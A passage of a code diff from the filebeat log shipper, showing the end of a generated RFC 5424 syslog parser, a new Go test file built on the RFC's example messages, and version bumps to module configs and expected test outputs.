_test_eof284: + cs = 284 + goto _test_eof + _test_eof285: + cs = 285 + goto _test_eof + _test_eof286: + cs = 286 + goto _test_eof + _test_eof287: + cs = 287 + goto _test_eof + _test_eof288: + cs = 288 + goto _test_eof + _test_eof289: + cs = 289 + goto _test_eof + _test_eof290: + cs = 290 + goto _test_eof + _test_eof291: + cs = 291 + goto _test_eof + _test_eof292: + cs = 292 + goto _test_eof + _test_eof293: + cs = 293 + goto _test_eof + _test_eof294: + cs = 294 + goto _test_eof + _test_eof295: + cs = 295 + goto _test_eof + _test_eof296: + cs = 296 + goto _test_eof + _test_eof297: + cs = 297 + goto _test_eof + _test_eof298: + cs = 298 + goto _test_eof + _test_eof299: + cs = 299 + goto _test_eof + _test_eof300: + cs = 300 + goto _test_eof + _test_eof301: + cs = 301 + goto _test_eof + _test_eof302: + cs = 302 + goto _test_eof + _test_eof303: + cs = 303 + goto _test_eof + _test_eof304: + cs = 304 + goto _test_eof + _test_eof305: + cs = 305 + goto _test_eof + _test_eof306: + cs = 306 + goto _test_eof + _test_eof307: + cs = 307 + goto _test_eof + _test_eof308: + cs = 308 + goto _test_eof + _test_eof309: + cs = 309 + goto _test_eof + _test_eof310: + cs = 310 + goto _test_eof + _test_eof311: + cs = 311 + goto _test_eof + _test_eof312: + cs = 312 + goto _test_eof + _test_eof313: + cs = 313 + goto _test_eof + _test_eof314: + cs = 314 + goto _test_eof + _test_eof315: + cs = 315 + goto _test_eof + _test_eof316: + cs = 316 + goto _test_eof + _test_eof317: + cs = 317 + goto _test_eof + _test_eof318: + cs = 318 + goto _test_eof + _test_eof319: + cs = 319 + goto _test_eof + _test_eof320: + cs = 320 + goto _test_eof + _test_eof321: + cs = 321 + goto _test_eof + _test_eof322: + cs = 322 + goto _test_eof + _test_eof323: + cs = 323 + goto _test_eof + _test_eof324: + cs = 324 + goto _test_eof + _test_eof325: + cs = 325 + goto _test_eof + _test_eof326: + cs = 326 + goto _test_eof + _test_eof327: + cs = 327 + goto _test_eof + _test_eof328: + cs = 328 + goto _test_eof + _test_eof329: + cs = 329 + goto _test_eof + _test_eof330: + cs = 330 + goto _test_eof + _test_eof331: + cs = 331 + goto _test_eof + _test_eof332: + cs = 332 + goto _test_eof + _test_eof333: + cs = 333 + goto _test_eof + _test_eof334: + cs = 334 + goto _test_eof + _test_eof335: + cs = 335 + goto _test_eof + _test_eof336: + cs = 336 + goto _test_eof + _test_eof337: + cs = 337 + goto _test_eof + _test_eof338: + cs = 338 + goto _test_eof + _test_eof339: + cs = 339 + goto _test_eof + _test_eof340: + cs = 340 + goto _test_eof + _test_eof341: + cs = 341 + goto _test_eof + _test_eof342: + cs = 342 + goto _test_eof + _test_eof343: + cs = 343 + goto _test_eof + _test_eof344: + cs = 344 + goto _test_eof + _test_eof345: + cs = 345 + goto _test_eof + _test_eof346: + cs = 346 + goto _test_eof + _test_eof347: + cs = 347 + goto _test_eof + _test_eof348: + cs = 348 + goto _test_eof + _test_eof349: + cs = 349 + goto _test_eof + _test_eof350: + cs = 350 + goto _test_eof + _test_eof351: + cs = 351 + goto _test_eof + _test_eof352: + cs = 352 + goto _test_eof + _test_eof353: + cs = 353 + goto _test_eof + _test_eof354: + cs = 354 + goto _test_eof + _test_eof355: + cs = 355 + goto _test_eof + _test_eof356: + cs = 356 + goto _test_eof + _test_eof357: + cs = 357 + goto _test_eof + _test_eof358: + cs = 358 + goto _test_eof + _test_eof359: + cs = 359 + goto _test_eof + _test_eof360: + cs = 360 + goto _test_eof + _test_eof361: + cs = 361 + goto _test_eof + _test_eof362: + cs = 362 + goto _test_eof + _test_eof363: + cs = 363 + goto _test_eof + _test_eof364: + cs = 364 + goto _test_eof + _test_eof365: + cs = 365 + goto _test_eof + _test_eof366: + cs = 366 + goto _test_eof + _test_eof367: + cs = 367 + goto _test_eof + _test_eof368: + cs = 368 + goto _test_eof + _test_eof369: + cs = 369 + goto _test_eof + _test_eof370: + cs = 370 + goto _test_eof + _test_eof371: + cs = 371 + goto _test_eof + _test_eof372: + cs = 372 + goto _test_eof + _test_eof373: + cs = 373 + goto _test_eof + _test_eof374: + cs = 374 + goto _test_eof + _test_eof375: + cs = 375 + goto _test_eof + _test_eof376: + cs = 376 + goto _test_eof + _test_eof377: + cs = 377 + goto _test_eof + _test_eof378: + cs = 378 + goto _test_eof + _test_eof379: + cs = 379 + goto _test_eof + _test_eof380: + cs = 380 + goto _test_eof + _test_eof381: + cs = 381 + goto _test_eof + _test_eof382: + cs = 382 + goto _test_eof + _test_eof383: + cs = 383 + goto _test_eof + _test_eof384: + cs = 384 + goto _test_eof + _test_eof385: + cs = 385 + goto _test_eof + _test_eof386: + cs = 386 + goto _test_eof + _test_eof387: + cs = 387 + goto _test_eof + _test_eof388: + cs = 388 + goto _test_eof + _test_eof389: + cs = 389 + goto _test_eof + _test_eof390: + cs = 390 + goto _test_eof + _test_eof391: + cs = 391 + goto _test_eof + _test_eof392: + cs = 392 + goto _test_eof + _test_eof393: + cs = 393 + goto _test_eof + _test_eof394: + cs = 394 + goto _test_eof + _test_eof395: + cs = 395 + goto _test_eof + _test_eof396: + cs = 396 + goto _test_eof + _test_eof397: + cs = 397 + goto _test_eof + _test_eof398: + cs = 398 + goto _test_eof + _test_eof399: + cs = 399 + goto _test_eof + _test_eof400: + cs = 400 + goto _test_eof + _test_eof401: + cs = 401 + goto _test_eof + _test_eof402: + cs = 402 + goto _test_eof + _test_eof403: + cs = 403 + goto _test_eof + _test_eof404: + cs = 404 + goto _test_eof + _test_eof405: + cs = 405 + goto _test_eof + _test_eof406: + cs = 406 + goto _test_eof + _test_eof407: + cs = 407 + goto _test_eof + _test_eof408: + cs = 408 + goto _test_eof + _test_eof409: + cs = 409 + goto _test_eof + _test_eof410: + cs = 410 + goto _test_eof + _test_eof411: + cs = 411 + goto _test_eof + _test_eof412: + cs = 412 + goto _test_eof + _test_eof413: + cs = 413 + goto _test_eof + _test_eof414: + cs = 414 + goto _test_eof + _test_eof415: + cs = 415 + goto _test_eof + _test_eof416: + cs = 416 + goto _test_eof + _test_eof417: + cs = 417 + goto _test_eof + _test_eof418: + cs = 418 + goto _test_eof + _test_eof419: + cs = 419 + goto _test_eof + _test_eof420: + cs = 420 + goto _test_eof + _test_eof421: + cs = 421 + goto _test_eof + _test_eof422: + cs = 422 + goto _test_eof + _test_eof423: + cs = 423 + goto _test_eof + _test_eof424: + cs = 424 + goto _test_eof + _test_eof425: + cs = 425 + goto _test_eof + _test_eof426: + cs = 426 + goto _test_eof + _test_eof427: + cs = 427 + goto _test_eof + _test_eof428: + cs = 428 + goto _test_eof + _test_eof429: + cs = 429 + goto _test_eof + _test_eof430: + cs = 430 + goto _test_eof + _test_eof431: + cs = 431 + goto _test_eof + _test_eof432: + cs = 432 + goto _test_eof + _test_eof433: + cs = 433 + goto _test_eof + _test_eof434: + cs = 434 + goto _test_eof + _test_eof435: + cs = 435 + goto _test_eof + _test_eof436: + cs = 436 + goto _test_eof + _test_eof437: + cs = 437 + goto _test_eof + _test_eof438: + cs = 438 + goto _test_eof + _test_eof439: + cs = 439 + goto _test_eof + _test_eof440: + cs = 440 + goto _test_eof + _test_eof441: + cs = 441 + goto _test_eof + _test_eof442: + cs = 442 + goto _test_eof + _test_eof443: + cs = 443 + goto _test_eof + _test_eof444: + cs = 444 + goto _test_eof + _test_eof445: + cs = 445 + goto _test_eof + _test_eof446: + cs = 446 + goto _test_eof + _test_eof447: + cs = 447 + goto _test_eof + _test_eof448: + cs = 448 + goto _test_eof + _test_eof449: + cs = 449 + goto _test_eof + _test_eof450: + cs = 450 + goto _test_eof + _test_eof451: + cs = 451 + goto _test_eof + _test_eof452: + cs = 452 + goto _test_eof + _test_eof453: + cs = 453 + goto _test_eof + _test_eof454: + cs = 454 + goto _test_eof + _test_eof455: + cs = 455 + goto _test_eof + _test_eof456: + cs = 456 + goto _test_eof + _test_eof457: + cs = 457 + goto _test_eof + _test_eof458: + cs = 458 + goto _test_eof + _test_eof459: + cs = 459 + goto _test_eof + _test_eof460: + cs = 460 + goto _test_eof + _test_eof461: + cs = 461 + goto _test_eof + _test_eof462: + cs = 462 + goto _test_eof + _test_eof463: + cs = 463 + goto _test_eof + _test_eof464: + cs = 464 + goto _test_eof + _test_eof465: + cs = 465 + goto _test_eof + _test_eof466: + cs = 466 + goto _test_eof + _test_eof467: + cs = 467 + goto _test_eof + _test_eof468: + cs = 468 + goto _test_eof + _test_eof469: + cs = 469 + goto _test_eof + _test_eof470: + cs = 470 + goto _test_eof + _test_eof471: + cs = 471 + goto _test_eof + _test_eof472: + cs = 472 + goto _test_eof + _test_eof473: + cs = 473 + goto _test_eof + _test_eof474: + cs = 474 + goto _test_eof + _test_eof475: + cs = 475 + goto _test_eof + _test_eof476: + cs = 476 + goto _test_eof + _test_eof477: + cs = 477 + goto _test_eof + _test_eof478: + cs = 478 + goto _test_eof + _test_eof479: + cs = 479 + goto _test_eof + _test_eof480: + cs = 480 + goto _test_eof + _test_eof481: + cs = 481 + goto _test_eof + _test_eof482: + cs = 482 + goto _test_eof + _test_eof483: + cs = 483 + goto _test_eof + _test_eof484: + cs = 484 + goto _test_eof + _test_eof485: + cs = 485 + goto _test_eof + _test_eof486: + cs = 486 + goto _test_eof + _test_eof487: + cs = 487 + goto _test_eof + _test_eof488: + cs = 488 + goto _test_eof + _test_eof489: + cs = 489 + goto _test_eof + _test_eof490: + cs = 490 + goto _test_eof + _test_eof491: + cs = 491 + goto _test_eof + _test_eof492: + cs = 492 + goto _test_eof + _test_eof493: + cs = 493 + goto _test_eof + _test_eof494: + cs = 494 + goto _test_eof + _test_eof495: + cs = 495 + goto _test_eof + _test_eof496: + cs = 496 + goto _test_eof + _test_eof497: + cs = 497 + goto _test_eof + _test_eof498: + cs = 498 + goto _test_eof + _test_eof499: + cs = 499 + goto _test_eof + _test_eof500: + cs = 500 + goto _test_eof + _test_eof501: + cs = 501 + goto _test_eof + _test_eof502: + cs = 502 + goto _test_eof + _test_eof503: + cs = 503 + goto _test_eof + _test_eof504: + cs = 504 + goto _test_eof + _test_eof505: + cs = 505 + goto _test_eof + _test_eof506: + cs = 506 + goto _test_eof + _test_eof507: + cs = 507 + goto _test_eof + _test_eof508: + cs = 508 + goto _test_eof + _test_eof509: + cs = 509 + goto _test_eof + _test_eof510: + cs = 510 + goto _test_eof + _test_eof511: + cs = 511 + goto _test_eof + _test_eof512: + cs = 512 + goto _test_eof + _test_eof513: + cs = 513 + goto _test_eof + _test_eof514: + cs = 514 + goto _test_eof + _test_eof515: + cs = 515 + goto _test_eof + _test_eof516: + cs = 516 + goto _test_eof + _test_eof517: + cs = 517 + goto _test_eof + _test_eof518: + cs = 518 + goto _test_eof + _test_eof519: + cs = 519 + goto _test_eof + _test_eof520: + cs = 520 + goto _test_eof + _test_eof521: + cs = 521 + goto _test_eof + _test_eof522: + cs = 522 + goto _test_eof + _test_eof523: + cs = 523 + goto _test_eof + _test_eof524: + cs = 524 + goto _test_eof + _test_eof525: + cs = 525 + goto _test_eof + _test_eof526: + cs = 526 + goto _test_eof + _test_eof527: + cs = 527 + goto _test_eof + _test_eof528: + cs = 528 + goto _test_eof + _test_eof529: + cs = 529 + goto _test_eof + _test_eof530: + cs = 530 + goto _test_eof + _test_eof531: + cs = 531 + goto _test_eof + _test_eof532: + cs = 532 + goto _test_eof + _test_eof533: + cs = 533 + goto _test_eof + _test_eof534: + cs = 534 + goto _test_eof + _test_eof535: + cs = 535 + goto _test_eof + _test_eof536: + cs = 536 + goto _test_eof + _test_eof537: + cs = 537 + goto _test_eof + _test_eof538: + cs = 538 + goto _test_eof + _test_eof539: + cs = 539 + goto _test_eof + _test_eof540: + cs = 540 + goto _test_eof + _test_eof541: + cs = 541 + goto _test_eof + _test_eof542: + cs = 542 + goto _test_eof + _test_eof543: + cs = 543 + goto _test_eof + _test_eof544: + cs = 544 + goto _test_eof + _test_eof545: + cs = 545 + goto _test_eof + _test_eof546: + cs = 546 + goto _test_eof + _test_eof547: + cs = 547 + goto _test_eof + _test_eof548: + cs = 548 + goto _test_eof + _test_eof549: + cs = 549 + goto _test_eof + _test_eof550: + cs = 550 + goto _test_eof + _test_eof551: + cs = 551 + goto _test_eof + _test_eof552: + cs = 552 + goto _test_eof + _test_eof553: + cs = 553 + goto _test_eof + _test_eof554: + cs = 554 + goto _test_eof + _test_eof555: + cs = 555 + goto _test_eof + _test_eof556: + cs = 556 + goto _test_eof + _test_eof557: + cs = 557 + goto _test_eof + _test_eof558: + cs = 558 + goto _test_eof + _test_eof559: + cs = 559 + goto _test_eof + _test_eof560: + cs = 560 + goto _test_eof + _test_eof561: + cs = 561 + goto _test_eof + _test_eof562: + cs = 562 + goto _test_eof + _test_eof563: + cs = 563 + goto _test_eof + _test_eof564: + cs = 564 + goto _test_eof + _test_eof565: + cs = 565 + goto _test_eof + _test_eof566: + cs = 566 + goto _test_eof + _test_eof567: + cs = 567 + goto _test_eof + _test_eof568: + cs = 568 + goto _test_eof + _test_eof569: + cs = 569 + goto _test_eof + _test_eof570: + cs = 570 + goto _test_eof + _test_eof571: + cs = 571 + goto _test_eof + _test_eof572: + cs = 572 + goto _test_eof + _test_eof573: + cs = 573 + goto _test_eof + _test_eof574: + cs = 574 + goto _test_eof + _test_eof575: + cs = 575 + goto _test_eof + _test_eof576: + cs = 576 + goto _test_eof + _test_eof577: + cs = 577 + goto _test_eof + _test_eof578: + cs = 578 + goto _test_eof + _test_eof579: + cs = 579 + goto _test_eof + _test_eof580: + cs = 580 + goto _test_eof + _test_eof581: + cs = 581 + goto _test_eof + _test_eof582: + cs = 582 + goto _test_eof + _test_eof583: + cs = 583 + goto _test_eof + _test_eof584: + cs = 584 + goto _test_eof + _test_eof585: + cs = 585 + goto _test_eof + _test_eof586: + cs = 586 + goto _test_eof + + _test_eof: + { + } + if (p) == eof { + switch cs { + case 589: +//line parser/common.rl:11 + + event.SetMessage(data[tok:p]) + + case 588: +//line parser/common.rl:3 + + tok = p + +//line parser/common.rl:11 + + event.SetMessage(data[tok:p]) + +//line rfc5424_parser.go:9756 + } + } + + _out: + { + } + } + +//line parser/rfc5424_parser.rl:35 + +} diff --git a/filebeat/input/syslog/rfc5424_test.go b/filebeat/input/syslog/rfc5424_test.go new file mode 100644 index 00000000000..a22fe6a0e2d --- /dev/null +++ b/filebeat/input/syslog/rfc5424_test.go @@ -0,0 +1,330 @@ +// Licensed to Elasticsearch B.V. under one or more contributor +// license agreements. See the NOTICE file distributed with +// this work for additional information regarding copyright +// ownership. Elasticsearch B.V. licenses this file to you under +// the Apache License, Version 2.0 (the "License"); you may +// not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package syslog + +import ( + "fmt" + "testing" + "time" + + "github.com/stretchr/testify/assert" +) + +const BOM = "\xEF\xBB\xBF" + +const VersionTestTemplate = `<34>%d 2003-10-11T22:14:15.003Z mymachine.example.com su - ID47 - ` + BOM + `'su root' failed for lonvick on /dev/pts/8` +const PriorityTestTemplate = `<%d>1 2003-10-11T22:14:15.003Z mymachine.example.com su - ID47 - ` + BOM + `'su root' failed for lonvick on /dev/pts/8` + +// https://tools.ietf.org/html/rfc5424#section-6.5 +const RfcDoc65Example1 = `<34>1 2003-10-11T22:14:15.003Z mymachine.example.com su - ID47 - ` + BOM + `'su root' failed for lonvick on /dev/pts/8` +const RfcDoc65Example2 = `<165>1 2003-08-24T05:14:15.000003-07:00 192.0.2.1 myproc 8710 - - %% It's time to make the do-nuts.` +const RfcDoc65Example3 = `<165>1 2003-10-11T22:14:15.003Z mymachine.example.com evntslog - ID47 [exampleSDID@32473 iut="3" eventSource="Application" eventID="1011"] ` + BOM + `An application event log entry...` +const RfcDoc65Example4 = `<165>1 2003-10-11T22:14:15.003Z mymachine.example.com evntslog - ID47 [exampleSDID@32473 iut="3" eventSource="Application" eventID="1011"][examplePriority@32473 class="high"]` +const RfcDoc65Example4WithoutSD = `<165>1 2003-10-11T22:14:15.003Z mymachine.example.com evntslog - ID47 ` +const MESSAGE = `An application event log entry...` + +func getTestEvent() event { + return event{ + priority: 34, + version: 1, + hostname: "mymachine.example.com", + appName: "su", + processID: "-", + msgID: "ID47", + year: 2003, + month: 10, + day: 11, + hour: 22, + minute: 14, + second: 15, + nanosecond: 3000000, + message: "'su root' failed for lonvick on /dev/pts/8", + } +} + +type testRule struct { + title string + log []byte + syslog event + isFailed bool +} + +func runTests(rules []testRule, t *testing.T) { + for _, rule := range rules { + t.Run(fmt.Sprintf("%s:%s", rule.title, string(rule.log)), func(t *testing.T) { + l := newEvent() + ParserRFC5424(rule.log, l) + if rule.isFailed { + assert.Equal(t, false, l.IsValid()) + return + } else { + assert.Equal(t, true, l.IsValid()) + } + AssertEvent(t, rule.syslog, l) + }) + } +} +func TestRfc5424ParseHeader(t *testing.T) { + var tests = []testRule{{ + title: "RfcDoc 6.5 Example1", + log: []byte(RfcDoc65Example1), + syslog: getTestEvent(), + }, { + title: "RfcDoc 6.5 Example2", + log: []byte(RfcDoc65Example2), + syslog: event{ + priority: 165, + version: 1, + hostname: "192.0.2.1", + appName: "myproc", + processID: "8710", + msgID: "-", + year: 2003, + month: 8, + day: 24, + hour: 5, + minute: 14, + second: 15, + nanosecond: 3000, + message: `%% It's time to make the do-nuts.`, + loc: time.FixedZone("", -7*3600), + }, + }} + runTests(tests, t) +} + +func CreateStructuredDataWithMsg(msg string, data EventData) event { + return event{ + priority: 165, + version: 1, + hostname: "mymachine.example.com", + appName: "evntslog", + processID: "-", + msgID: "ID47", + year: 2003, + month: 10, + day: 11, + hour: 22, + minute: 14, + second: 15, + nanosecond: 3000000, + message: msg, + data: data, + } +} +func CreateStructuredData(data EventData) event { + return CreateStructuredDataWithMsg(MESSAGE, data) +} + +func CreateTest(title string, log string, syslog event) testRule { + return testRule{ + title: title, + log: []byte(log), + syslog: syslog, + isFailed: false, + } +} + +func CreateParseFailTest(title string, log string, syslog event) testRule { + return testRule{ + title: title, + log: []byte(log), + syslog: syslog, + isFailed: true, + } +} + +func TestRfc5424ParseStructuredData(t *testing.T) { + var tests = []testRule{ + CreateTest("RfcDoc65Example3", + RfcDoc65Example3, + CreateStructuredData(EventData{ + "exampleSDID@32473": { + "iut": "3", + "eventID": "1011", + "eventSource": "Application", + }, + })), + CreateTest("RfcDoc65Example4", + RfcDoc65Example4, + CreateStructuredDataWithMsg("", EventData{ + "exampleSDID@32473": { + "iut": "3", + "eventID": "1011", + "eventSource": "Application", + }, + "examplePriority@32473": { + "class": "high", + }, + })), + CreateTest("test structured data param value with escape", + `<165>1 2003-10-11T22:14:15.003Z mymachine.example.com evntslog - ID47 [exampleSDID@32473 iut="\]3" eventSource="\"Application\"" eventID="1011"] `+MESSAGE, + CreateStructuredData(EventData{ + "exampleSDID@32473": { + "iut": "]3", + "eventID": "1011", + "eventSource": `"Application"`, + }, + })), + // https://tools.ietf.org/html/rfc5424#section-6.3.5 + CreateTest("RfcDoc635Example1", + RfcDoc65Example4WithoutSD+`[exampleSDID@32473 iut="3" eventSource="Application" eventID="1011"]`, + CreateStructuredDataWithMsg("", EventData{ + "exampleSDID@32473": { + "iut": "3", + "eventID": "1011", + "eventSource": "Application", + }, + })), + + CreateTest("RfcDoc635Example2", + RfcDoc65Example4WithoutSD+`[exampleSDID@32473 iut="3" eventSource="Application" eventID="1011"][examplePriority@32473 class="high"]`, + CreateStructuredDataWithMsg("", EventData{ + "exampleSDID@32473": { + "iut": "3", + "eventID": "1011", + "eventSource": "Application", + }, + "examplePriority@32473": { + "class": "high", + }, + })), + CreateTest("RfcDoc635Example3", + RfcDoc65Example4WithoutSD+`[exampleSDID@32473 iut="3" eventSource="Application" eventID="1011"] [examplePriority@32473 class="high"] `+MESSAGE, + CreateStructuredDataWithMsg(`[examplePriority@32473 class="high"] `+MESSAGE, EventData{ + "exampleSDID@32473": { + "iut": "3", + "eventID": "1011", + "eventSource": "Application", + }, + })), + CreateParseFailTest("RfcDoc635Example4", + RfcDoc65Example4WithoutSD+`[ exampleSDID@32473 iut="3" eventSource="Application" eventID="1011" ][examplePriority@32473 class="high"]`+MESSAGE, + CreateStructuredDataWithMsg(``, EventData{})), + + CreateTest("RfcDoc635Example5", + RfcDoc65Example4WithoutSD+`[sigSig ver="1" rsID="1234" iut="3" signature="..."] `+MESSAGE, + CreateStructuredDataWithMsg(MESSAGE, EventData{ + "sigSig": { + "ver": "1", + "rsID": "1234", + "iut": "3", + "signature": "...", + }, + })), + } + + runTests(tests, t) +} +func createVersionTestRule(v int, success bool) testRule { + var rule = testRule{ + title: fmt.Sprintf("versionTest v:%d", v), + log: []byte(fmt.Sprintf(VersionTestTemplate, v)), + syslog: event{ + priority: 34, + version: v, + hostname: "mymachine.example.com", + appName: "su", + processID: "-", + msgID: "ID47", + year: 2003, + month: 10, + day: 11, + hour: 22, + minute: 14, + second: 15, + nanosecond: 3000000, + message: "'su root' failed for lonvick on /dev/pts/8", + }} + + if !success { + rule.isFailed = true + return rule + } + + return rule +} + +func createPriorityTestRule(v int, success bool) testRule { + var rule = testRule{ + title: fmt.Sprintf("priorityTest v:%d", v), + log: []byte(fmt.Sprintf(PriorityTestTemplate, v)), + syslog: event{ + priority: v, + version: 1, + hostname: "mymachine.example.com", + appName: "su", + processID: "-", + msgID: "ID47", + year: 2003, + month: 10, + day: 11, + hour: 22, + minute: 14, + second: 15, + message: "'su root' failed for lonvick on /dev/pts/8", + nanosecond: 3000000, + }, + } + if !success { + rule.isFailed = true + return rule + } + return rule +} + +func TestRfc5424SyslogParserValueBoundary(t *testing.T) { + var tests []testRule + + // add priorityTest, 0 <= priority <= 191. + tests = append(tests, createPriorityTestRule(0, true)) + tests = append(tests, createPriorityTestRule(20, true)) + tests = append(tests, createPriorityTestRule(180, true)) + tests = append(tests, createPriorityTestRule(190, true)) + tests = append(tests, createPriorityTestRule(191, true)) + tests = append(tests, createPriorityTestRule(192, false)) + tests = append(tests, createPriorityTestRule(200, false)) + tests = append(tests, createPriorityTestRule(1000, false)) + + // add version test, version <= 999 + tests = append(tests, createVersionTestRule(0, false)) + tests = append(tests, createVersionTestRule(30, true)) + tests = append(tests, createVersionTestRule(100, true)) + tests = append(tests, createVersionTestRule(1000, false)) + + runTests(tests, t) +} + +func AssertEvent(t *testing.T, except event, actual *event) { + assert.Equal(t, except.Priority(), actual.Priority()) + assert.Equal(t, except.Version(), actual.Version()) + assert.Equal(t, except.Year(), actual.Year()) + assert.Equal(t, except.Month(), actual.Month()) + assert.Equal(t, except.Day(), actual.Day()) + assert.Equal(t, except.Hour(), actual.Hour()) + assert.Equal(t, except.Minute(), actual.Minute()) + assert.Equal(t, except.Second(), actual.Second()) + assert.Equal(t, except.Nanosecond(), actual.Nanosecond()) + assert.Equal(t, except.loc, actual.loc) + assert.Equal(t, except.Hostname(), actual.Hostname()) + assert.Equal(t, except.AppName(), actual.AppName()) + assert.Equal(t, except.ProcID(), actual.ProcID()) + assert.Equal(t, except.MsgID(), actual.MsgID()) + assert.Equal(t, except.data, actual.data) + assert.Equal(t, except.Message(), actual.Message()) +} diff --git a/filebeat/module/apache/access/config/access.yml b/filebeat/module/apache/access/config/access.yml index 2db4213af7b..100ae74fadc 100644 --- a/filebeat/module/apache/access/config/access.yml +++ b/filebeat/module/apache/access/config/access.yml @@ -8,4 +8,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/filebeat/module/apache/access/test/test-vhost.log-expected.json b/filebeat/module/apache/access/test/test-vhost.log-expected.json index b332788ad2b..2b0bb3cd06c 100644 --- a/filebeat/module/apache/access/test/test-vhost.log-expected.json +++ b/filebeat/module/apache/access/test/test-vhost.log-expected.json @@ -20,6 +20,7 @@ "url.original": "/hello", "user.name": "-", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:50.0) Gecko/20100101 Firefox/50.0", "user_agent.os.full": "Mac OS X 10.12", diff --git a/filebeat/module/apache/access/test/test.log-expected.json b/filebeat/module/apache/access/test/test.log-expected.json index ebe88847586..6d49efee866 100644 --- a/filebeat/module/apache/access/test/test.log-expected.json +++ b/filebeat/module/apache/access/test/test.log-expected.json @@ -40,6 +40,7 @@ "url.original": "/hello", "user.name": "-", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:50.0) Gecko/20100101 Firefox/50.0", "user_agent.os.full": "Mac OS X 10.12", @@ -84,6 +85,7 @@ "url.original": "/stringpatch", "user.name": "-", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox Alpha", "user_agent.original": "Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2", "user_agent.os.full": "Windows 7", @@ -112,6 +114,7 @@ "url.original": "/status", "user.name": "-", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox Alpha", "user_agent.original": "Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2", "user_agent.os.full": "Windows 7", @@ -137,6 +140,7 @@ "source.ip": "127.0.0.1", "user.name": "-", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "-" } diff --git a/filebeat/module/apache/access/test/ubuntu-2.2.22.log-expected.json b/filebeat/module/apache/access/test/ubuntu-2.2.22.log-expected.json index e9680e5b7fb..9bdfab36818 100644 --- a/filebeat/module/apache/access/test/ubuntu-2.2.22.log-expected.json +++ b/filebeat/module/apache/access/test/ubuntu-2.2.22.log-expected.json @@ -20,6 +20,7 @@ "url.original": "/", "user.name": "-", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "Wget", "user_agent.original": "Wget/1.13.4 (linux-gnu)", "user_agent.os.name": "Linux", @@ -46,6 +47,7 @@ "url.original": "/", "user.name": "-", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36", "user_agent.os.full": "Mac OS X 10.12.0", @@ -74,6 +76,7 @@ "url.original": "/favicon.ico", "user.name": "-", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36", "user_agent.os.full": "Mac OS X 10.12.0", @@ -102,6 +105,7 @@ "url.original": "/", "user.name": "-", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:50.0) Gecko/20100101 Firefox/50.0", "user_agent.os.full": "Mac OS X 10.12", @@ -130,6 +134,7 @@ "url.original": "/favicon.ico", "user.name": "-", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:50.0) Gecko/20100101 Firefox/50.0", "user_agent.os.full": "Mac OS X 10.12", @@ -158,6 +163,7 @@ "url.original": "/favicon.ico", "user.name": "-", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:50.0) Gecko/20100101 Firefox/50.0", "user_agent.os.full": "Mac OS X 10.12", @@ -186,6 +192,7 @@ "url.original": "/test", "user.name": "-", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:50.0) Gecko/20100101 Firefox/50.0", "user_agent.os.full": "Mac OS X 10.12", @@ -214,6 +221,7 @@ "url.original": "/hello", "user.name": "-", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:50.0) Gecko/20100101 Firefox/50.0", "user_agent.os.full": "Mac OS X 10.12", @@ -242,6 +250,7 @@ "url.original": "/crap", "user.name": "-", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:50.0) Gecko/20100101 Firefox/50.0", "user_agent.os.full": "Mac OS X 10.12", diff --git a/filebeat/module/apache/error/config/error.yml b/filebeat/module/apache/error/config/error.yml index 2bd2a117d1c..a33bd9b635e 100644 --- a/filebeat/module/apache/error/config/error.yml +++ b/filebeat/module/apache/error/config/error.yml @@ -10,4 +10,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/filebeat/module/auditd/log/config/log.yml b/filebeat/module/auditd/log/config/log.yml index 2db4213af7b..100ae74fadc 100644 --- a/filebeat/module/auditd/log/config/log.yml +++ b/filebeat/module/auditd/log/config/log.yml @@ -8,4 +8,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git 